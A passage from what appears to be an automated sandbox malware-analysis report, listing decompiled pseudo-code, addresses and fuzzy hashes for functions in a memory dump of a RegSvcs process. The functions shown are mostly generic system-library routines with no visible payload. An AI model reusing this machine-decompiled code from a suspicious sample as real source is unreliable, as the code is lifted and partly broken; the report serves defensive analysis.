					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E00AFFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x00b11074
0x00b11080
0x00b11082
0x00b1108a
0x00b1108f
0x00b11093
0x00b110ab
0x00b110ab
0x00b110c3
0x00b110cf
0x00b110e1
0x00b110d1
0x00b110da
0x00b110da
0x00b110e9
0x00b110f5
0x00b110f5
0x00b110fe

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b1040ba340c6c885b9edd7bc711d3f8d430fa9ba1fcf50f7594ba26e579d7ba
Instruction ID: 1baa6bbb2722c82e384d7bdf497b35a8b1722d8e90108a008b699435b3001244
Opcode Fuzzy Hash: 4b1040ba340c6c885b9edd7bc711d3f8d430fa9ba1fcf50f7594ba26e579d7ba
Instruction Fuzzy Hash: 970128725047429FC710DB6CC945B5A77E5EB84314F04C969F98583291EE31D9C0CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00AFFEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00AFFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0xb3d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00A8FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E00A67D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x00affec0
0x00affec0
0x00affecf
0x00affed9
0x00affede
0x00affee0
0x00affeeb
0x00affef3
0x00affef6
0x00affef9
0x00afff04
0x00afff16
0x00afff06
0x00afff0f
0x00afff0f
0x00afff21
0x00afff22
0x00afff24
0x00afff29
0x00afff3e

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee77e24a712ed0940afde2cf9b9b0b3076b21dd3bc077aa2ca9bba41abf15fba
Instruction ID: 7f294ac606439d88404414261ab29c11ce97a1eecf90fabedb46de734002fa62
Opcode Fuzzy Hash: ee77e24a712ed0940afde2cf9b9b0b3076b21dd3bc077aa2ca9bba41abf15fba
Instruction Fuzzy Hash: 0D018471A1020CAFDB14EBA9D946FBFB7B8EF44710F404066BA01AB291EA74DA01C795

Uniqueness

Uniqueness Score: -1.00%

Function 00AFFE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00AFFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0xb3d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00A8FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E00A67D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x00affe3f
0x00affe3f
0x00affe4e
0x00affe58
0x00affe5d
0x00affe5f
0x00affe6a
0x00affe72
0x00affe75
0x00affe78
0x00affe83
0x00affe95
0x00affe85
0x00affe8e
0x00affe8e
0x00affea0
0x00affea1
0x00affea3
0x00affea8
0x00affebd

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b16409a9740d9ade714e6d56998b848033a810252eacf2512b8bf28085f048f
Instruction ID: 4c26b5fc758b4a6a183cab6517f8e9c054e5fde17c7d2aaac85ab1f6b2e8ec9d
Opcode Fuzzy Hash: 7b16409a9740d9ade714e6d56998b848033a810252eacf2512b8bf28085f048f
Instruction Fuzzy Hash: F4018471A1020CAFDB14EFA9D846FBEB7B8EF44714F004066B900AB291DA74D901C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00B18A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00B18A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0xb3d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E00A67D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00A8B640(E00A89AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x00b18a62
0x00b18a71
0x00b18a79
0x00b18a82
0x00b18a85
0x00b18a89
0x00b18a8c
0x00b18a8f
0x00b18a92
0x00b18a95
0x00b18a9f
0x00b18ab1
0x00b18aa1
0x00b18aaa
0x00b18aaa
0x00b18abc
0x00b18abd
0x00b18abf
0x00b18ac4
0x00b18ada

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78289912ce3822793196e61a8cf0c00f90844b778f039081a63a418defc11184
Instruction ID: 598454e1d534d69f1720b570f59495a9f589ca50571349ceeac4d5ae4576785c
Opcode Fuzzy Hash: 78289912ce3822793196e61a8cf0c00f90844b778f039081a63a418defc11184
Instruction Fuzzy Hash: 89011A71A10218AFCB04EFA9D9819EEB7B8FF48350F50405AF905E7351EA34A9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B18ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00B18ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0xb3d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E00A67D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x00b18ed6
0x00b18ee5
0x00b18eed
0x00b18ef0
0x00b18efa
0x00b18f03
0x00b18f0c
0x00b18f15
0x00b18f24
0x00b18f27
0x00b18f31
0x00b18f43
0x00b18f33
0x00b18f3c
0x00b18f3c
0x00b18f4e
0x00b18f4f
0x00b18f51
0x00b18f56
0x00b18f69

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249a7b5ecea6f0ade7888783df1324de7402519d18c9c4eb2bcc205bd127846f
Instruction ID: 32cadbfcc7bf29124446451a390c660b15758ee38fc3f947942e341d71b26a53
Opcode Fuzzy Hash: 249a7b5ecea6f0ade7888783df1324de7402519d18c9c4eb2bcc205bd127846f
Instruction Fuzzy Hash: 19111E70A102099FDB04DFA8D541BAEF7F4FF08300F1442AAE519EB382EA349941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A4DB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E00A4DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E00A4E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L00A4E8B0(__ecx, _t14, 0xfff);
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x00a4db64
0x00a4db66
0x00a4db6b
0x00a4dbaa
0x00a4db71
0x00a4db76
0x00a4db7a
0x00a4dba3
0x00a4db7c
0x00a4db87
0x00a4db8b
0x00aa4fa1
0x00aa4fb3
0x00aa4fb8
0x00a4db91
0x00a4db96
0x00a4db98
0x00a4db98
0x00a4db8b
0x00a4db7a
0x00a4db9d
0x00a4dba2

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: bea1861d8812cd2cd517a50bb732162108583983722ef57a254d011bb56fb10f
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 36F0F63B2016229FD732AB598980F2BB6A5DFC2B60F270035F1059B345CAA08C0396E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E00A67D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E00A67D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E00AC7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x00a4b1e8
0x00a4b1ea
0x00a4b1f3
0x00aa4a17
0x00a4b1f9
0x00a4b1f9
0x00a4b1f9
0x00a4b201
0x00aa4a21
0x00aa4a2e
0x00000000
0x00000000
0x00aa4a3b
0x00aa4a4d
0x00aa4a3d
0x00aa4a46
0x00aa4a46
0x00aa4a55
0x00000000
0x00000000
0x00000000
0x00a4b20a
0x00a4b20a
0x00a4b20a
0x00a4b20a

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 943d6492616ca1f33d02ba49592d41e4684366fcad2c3c1e807aeb68553262c7
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 5601F436254680DFD322975DC904FA97BA8EFC6794F0904A1FA148B6B2E7B8CC00C725

Uniqueness

Uniqueness Score: -1.00%

Function 00ADFE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00ADFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0xb3d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E00A67D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00adfe96
0x00adfe9e
0x00adfea1
0x00adfead
0x00adfeb3
0x00adfeb9
0x00adfec3
0x00adfed5
0x00adfec5
0x00adfece
0x00adfece
0x00adfee0
0x00adfee1
0x00adfee3
0x00adfee8
0x00adfefb

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab8d8dc434e5afcca54419d1fd68f82a24ecf4aee3b8a07f25e3fa544b4ee109
Instruction ID: 5c755bccc3dfe672183808eb66afebc17e4c426a60af50f9179cfceceed72b81
Opcode Fuzzy Hash: ab8d8dc434e5afcca54419d1fd68f82a24ecf4aee3b8a07f25e3fa544b4ee109
Instruction Fuzzy Hash: 76016270A00208EFCB14EFA8D942A6EB7F4FF04704F144169B505DB392EA35D901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B0131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00B0131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0xb3d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E00A67D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x00b0131b
0x00b0132a
0x00b01330
0x00b01336
0x00b0133e
0x00b01341
0x00b01344
0x00b0134f
0x00b01361
0x00b01351
0x00b0135a
0x00b0135a
0x00b0136c
0x00b0136d
0x00b0136f
0x00b01374
0x00b01387

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947f7c2fb8b42cb7f85ae0023983ac9a9449e7ee1447a22e5681aa7865b8cd11
Instruction ID: 060356a3b0f1f4ebb8eadca3e19b15d37b509d9a973345328abb2f53c347dd72
Opcode Fuzzy Hash: 947f7c2fb8b42cb7f85ae0023983ac9a9449e7ee1447a22e5681aa7865b8cd11
Instruction Fuzzy Hash: A6014471A0120CAFCB04EFA9D546AAEB7F4FF08700F108459F905EB391E634DA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B18F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00B18F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0xb3d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E00A67D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x00b18f6a
0x00b18f79
0x00b18f81
0x00b18f84
0x00b18f8b
0x00b18f91
0x00b18f94
0x00b18f9e
0x00b18fb0
0x00b18fa0
0x00b18fa9
0x00b18fa9
0x00b18fbb
0x00b18fbc
0x00b18fbe
0x00b18fc3
0x00b18fd6

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9e17674e409b3fd6df93f6d279b00562b16a6ba3a76187091aaa084fadd8ce8
Instruction ID: 1a40559f3d5d3015352eb825b61fb445b311fafc0c83253c213c3f8dfd3afa9e
Opcode Fuzzy Hash: d9e17674e409b3fd6df93f6d279b00562b16a6ba3a76187091aaa084fadd8ce8
Instruction Fuzzy Hash: BC014474A0020CAFDB04EFA8D545AAEB7F4FF18300F504459B905EB391EB34DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B01608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00B01608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0xb3d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E00A67D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x00b01608
0x00b01617
0x00b0161d
0x00b01625
0x00b01628
0x00b0162b
0x00b01636
0x00b01648
0x00b01638
0x00b01641
0x00b01641
0x00b01653
0x00b01654
0x00b01656
0x00b0165b
0x00b0166e

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e4be99eb77380afa9337a416ba0bbbffcd895594ffcfdb23a7b6f5a82be11c
Instruction ID: 076d56f63cc65f2777d4e68e4a96cd2f76aef5f4d91e0e97ec12e722c25c6284
Opcode Fuzzy Hash: e5e4be99eb77380afa9337a416ba0bbbffcd895594ffcfdb23a7b6f5a82be11c
Instruction Fuzzy Hash: FEF06271A14248EFDB04EFA8D946AAEBBF4EF04300F0444A9B905EB391EA349900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00A6C577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A6C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E00A6C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xa211cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E00B188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x00a6c577
0x00a6c57d
0x00a6c581
0x00a6c5b5
0x00a6c5b9
0x00a6c5ce
0x00a6c5ce
0x00a6c5ca
0x00000000
0x00a6c5ca
0x00a6c5c4
0x00a6c5c8
0x00000000
0x00000000
0x00000000
0x00a6c5ad
0x00000000
0x00a6c5af

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b50c1e1e17829e41eb71c3a16ff091ed7d30367dfe24ba3812cec2489c3fdc5
Instruction ID: f922ccd04cacdf496a3230846e106d3faad60602ca0942d4212013261018377c
Opcode Fuzzy Hash: 3b50c1e1e17829e41eb71c3a16ff091ed7d30367dfe24ba3812cec2489c3fdc5
Instruction Fuzzy Hash: 56F0BEF29956A49FD731C728C914B327BF89B05770F9484ABE48787212C7B4FC80C291

Uniqueness

Uniqueness Score: -1.00%

Function 00B02073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B02073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E00AFFD22(__ecx);
				_t19 =  *0xb3849c - _t3; // 0x29b27cab
				if(_t19 == 0) {
					__eflags = _t17 -  *0xb38748; // 0x0
					if(__eflags <= 0) {
						E00B01C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0xb38724 & 0x00000004;
							if(( *0xb38724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0xb38724; // 0x0
					return E00AF8DF1(__ebx, 0xc0000374, 0xb35890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x00b02076
0x00b02078
0x00b0207d
0x00b02083
0x00b020a4
0x00b020aa
0x00b020ac
0x00b020b7
0x00b020ba
0x00b020bc
0x00b020c9
0x00b020c9
0x00b020d0
0x00b020d2
0x00000000
0x00b020d2
0x00b020be
0x00b020c3
0x00b020c5
0x00b020c7
0x00000000
0x00000000
0x00b020c7
0x00b020bc
0x00b020d4
0x00b02085
0x00b02085
0x00b020a3
0x00b020a3

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f82435986067e5e2c0901f689d4e7a675206cf7ec750146b2c904deee5a4eccd
Instruction ID: 63ee1b99b21fa65453bc90ef7196a85337a8fabde5cdd265d1622c28374c2a41
Opcode Fuzzy Hash: f82435986067e5e2c0901f689d4e7a675206cf7ec750146b2c904deee5a4eccd
Instruction Fuzzy Hash: 4FF0E52B4153888ADF366B28790A3E53FD5DB55350F3904C6F9909B282DE788D87CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A8927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00A8927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L00A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E00A8FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E00A892C6(_t11, _t14);
				}
				return _t11;
			}

0x00a89295
0x00a89299
0x00a8929f
0x00a892aa
0x00a892ad
0x00a892ae
0x00a892af
0x00a892b0
0x00a892b4
0x00a892bb
0x00a892bb
0x00a892c5

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: c63e15d18b55162674a032a9c5e54a920101de72335dde1b8ee111ab50e783f4
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 4DE06D322406406BE721AF5ADD85B5776A9AF86725F044079B9045E283CAE6DD0987A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B18D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00B18D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0xb3d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E00A67D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x00b18d34
0x00b18d43
0x00b18d4b
0x00b18d4e
0x00b18d52
0x00b18d5c
0x00b18d6e
0x00b18d5e
0x00b18d67
0x00b18d67
0x00b18d79
0x00b18d7a
0x00b18d7c
0x00b18d81
0x00b18d94

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bffb92d801bd3b769eab44fb8f79e5b7257139acf16155cf13fb8b650f2ad83a
Instruction ID: e873abf2c66608724fba28032f3d33c7befa235c9f7c6d974bee82935b3b1b64
